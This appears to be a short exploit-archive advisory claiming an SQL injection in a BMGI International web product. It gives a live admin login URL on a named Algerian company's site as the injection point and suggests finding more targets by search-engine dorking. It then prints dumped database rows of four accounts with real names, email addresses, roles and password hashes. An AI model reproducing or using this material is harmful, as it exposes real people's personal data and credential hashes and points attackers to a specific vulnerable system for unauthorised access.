====================================================================================================================================
| # Title : BMGI International Sql injection Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) | |
| # Vendor : http://www.bmgi-international.com/ |
| # Dork : n/a |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] inject here : http://www.scimat.dz/_Admin_root/authentification.php?lang=1&pw=1&user=yymfqisv
Database : scimat_scimat
Table : w4rk6h_dash
[4 entries]
+---------+--------------------+-----------+--------------------------------+---------------------------------------------+
| user_id | user_nom | user_role | user_email | user_password |
+---------+--------------------+-----------+--------------------------------+---------------------------------------------+
| 8 | bmgi international | 1 | contact@pixastudio.com | -oyd3vtYORf-YzGbkcYngAdFWq756npAaT0dMhkTTiU |
| 15 | bentoumi | 1 | ahmed-riadh.bentoumi@scimat.dz | u3K-ZsJi9OxXsGr_Smu15zPmDfyiYl5jwfQsZug5_x0 |
| 16 | sce-clientele | 2 | sce-clientele@scimat.dz | lDViIBP9LHfGoP0DTXgLCV5SKO0cWEszBie5njfJ_m0 |
| 18 | sce-programmation | 1 | sce-programmation@scimat.dz | lDViIBP9LHfGoP0DTXgLCV5SKO0cWEszBie5njfJ_m0 |
+---------+--------------------+-----------+--------------------------------+---------------------------------------------+
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh |
|
=======================================================================================================================================